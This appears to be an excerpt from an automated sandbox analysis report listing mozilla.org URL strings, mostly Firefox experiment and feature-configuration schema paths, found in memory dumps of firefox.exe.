Source: firefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017734041.000001CA0B145000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2000847293.000035CDA6803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2099687811.000001CA0B152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/id
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/enabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/appId
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/filterFetchResponse
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/javascriptValidator
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/louserzations
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/louserzations/anyOf/0
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/louserzations/anyOf/0/additionalProperties
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/louserzations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/louserzations/anyOf/1
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/mediaExceptionsStrategy
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/appName
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2000847293.000035CDA6803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/)
Source: firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/.Z
Source: firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/0
Source: firefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/03x
Source: firefox.exe, 00000003.00000003.1569147524.000001CA14FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1478676467.000001CA15B36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1677238252.000001CA0EA9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA19644000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1750634615.000001CA0DFB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1569147524.000001CA14FB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1931860870.000001CA0EB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1706743059.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1754777749.000001CA0BBA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1604994273.000001CA19743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA19654000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1808462601.000001CA0EB79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529691013.000001CA199C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529691013.000001CA199CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1449853441.000001CA0C1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1742840443.000001CA19661000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1481204041.000001CA0B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1510026280.000001CA0C1C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1516187370.000001CA0B3C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/Z
